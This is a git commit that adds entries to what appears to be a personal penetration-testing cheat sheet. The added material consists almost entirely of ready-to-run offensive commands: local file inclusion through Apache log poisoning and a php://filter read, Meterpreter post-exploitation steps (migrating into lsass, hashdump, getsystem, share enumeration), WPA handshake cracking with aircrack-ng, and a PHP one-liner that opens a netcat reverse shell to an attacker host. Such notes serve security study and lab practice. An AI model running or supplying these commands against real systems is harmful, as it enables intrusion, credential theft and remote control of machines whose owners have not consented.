This commit is contained in:
Stefan Friese 2021-10-05 01:48:56 +02:00
parent e89be67148
commit b65298a98c
4 changed files with 54 additions and 2 deletions

View File

@ -30,4 +30,9 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host:
```HTTP ```HTTP
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../' curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
``` ```
### Base64 Encoding via PHP
* Circumvent filter via encoding local files included ins a GET parameter value
```http
curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
```

View File

@ -66,9 +66,30 @@ use multi/http/apache_mod_cgi_bash_env_exec
``` ```
## Post Exploitation ## Post Exploitation
* Windows
* `load kiwi` * `load kiwi`
* `hashdump` * `load python`
* Windows
* list SAM database
```sh
migrate <lsass.exe-PID>
hashdump
```
* enum shares
```sh
post/windows/gather/enum_shares
```
* Linux * Linux
* `use post/linux/gather/hashdump` * `use post/linux/gather/hashdump`
## Other Meterpreter stuff
* Staged and in disguise running as another servicename
```
getpid
ps
```
* Attempt to elevate privileges
```sh
getsystem
```
* Use `multi/handler` or exploit and get an overview via `show payloads`
* UserID via `getuid`

20
misc/wifi/airmon-ng.md Normal file
View File

@ -0,0 +1,20 @@
# aircrack-ng
## airmon-ng
* Monitor on interface
```sh
airmon-ng start <interface>
```
## airodump-ng
* Capture traffic
## aircrack-ng
* Use captured network traffic to crack
* Specify targets via common options
* Create hashcap files as `HCCAPX` or `HCCAP`
```sh
aircrack-ng -w <wordlist> -b <bssidFromCapture> -j <outputHashcatFile> <INPUTFILE>
```

View File

@ -29,3 +29,9 @@ python -c 'import pty; pty.spawn("/bin/bash")'
* `ssh-keygen` * `ssh-keygen`
* copy priv key and `chmod 600` * copy priv key and `chmod 600`
* `cat id_rsa.pub > authorized_keys` on target * `cat id_rsa.pub > authorized_keys` on target
## As Code
### PHP
```sh
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>
```